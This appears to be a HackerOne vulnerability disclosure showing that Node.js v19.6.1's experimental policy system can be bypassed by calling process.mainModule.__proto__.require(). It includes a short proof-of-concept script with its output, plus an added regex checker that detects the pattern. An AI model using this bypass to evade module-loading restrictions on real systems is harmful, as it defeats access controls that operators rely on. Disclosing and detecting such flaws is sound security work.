HackerOne report by Haxatron1 (H1:1877919)
Feb 17, 2023 - 5:58 p.m.

Node.js: The use of __proto__ in process.mainModule.__proto__.require() bypasses the permission system in Node v19.6.1

Reporter: haxatron1 (hackerone.com)
Tags: node.js, bypass, permission system, __proto__, v19.6.1, bug bounty

EPSS: 0.001 (Low), percentile 22.0%

process.mainModule.require() works correctly with the permission system in Node v19.6.1.
However, using __proto__ in process.mainModule.__proto__.require() bypasses the check.

Description and STR

Consider the following policy.json:

{
  "resources": {
    "./proc.js": {
      "integrity": true
    }
  }
}

The policy only allows the proc.js file to be loaded, with no dependencies.

However, with the following proc.js:

const os = process.mainModule.__proto__.require("os")

console.log(process.version)
console.log(os.version())

We get the output:

└─$ ../node-v19.6.1-linux-x64/bin/node --experimental-policy=policy.json proc.js
v19.6.1
#1 SMP PREEMPT Debian 5.16.18-1kali1 (2022-04-01)
(node:2720) ExperimentalWarning: Policies are experimental.
(Use `node --trace-warnings ...` to show where the warning was created)

Therefore the os dependency can be loaded and os.version() executed even though it is not specified in the policy.
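As an added check that is not part of this report, the script below flags the prototype-walk form of require shown in proc.js, so files covered by a policy can be reviewed for it; the regex, the function name findProtoRequire and the sample inputs are constructed for this example.

```javascript
// Added example (not from the report): a source check that flags a
// `__proto__` property access followed by a `.require(` call, the exact
// shape used in the proc.js above. Deliberately narrow: it reports only
// that pattern, so a reviewer can triage a policy-protected entry file.
// Non-global regex: .exec() on a /g regex would carry lastIndex between lines.
const PROTO_REQUIRE = /\.__proto__\s*\.\s*require\s*\(/;

// Returns one finding per matching line: { line, match }.
function findProtoRequire(source) {
  const findings = [];
  source.split(/\r?\n/).forEach((text, idx) => {
    const m = PROTO_REQUIRE.exec(text);
    if (m) findings.push({ line: idx + 1, match: m[0] });
  });
  return findings;
}

// Constructed sample inputs: the proc.js from the report, and a benign
// variant that calls require through process.mainModule directly (which
// the policy check covers).
const PROC_JS = [
  'const os = process.mainModule.__proto__.require("os")',
  '',
  'console.log(process.version)',
  'console.log(os.version())',
].join('\n');

const BENIGN_JS = 'const os = process.mainModule.require("os")\n';

for (const f of findProtoRequire(PROC_JS)) {
  console.log(`proc.js:${f.line}: prototype-walk require: ${f.match}`);
}
console.log(`benign findings: ${findProtoRequire(BENIGN_JS).length}`);
```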

Impact

Bypass the permission system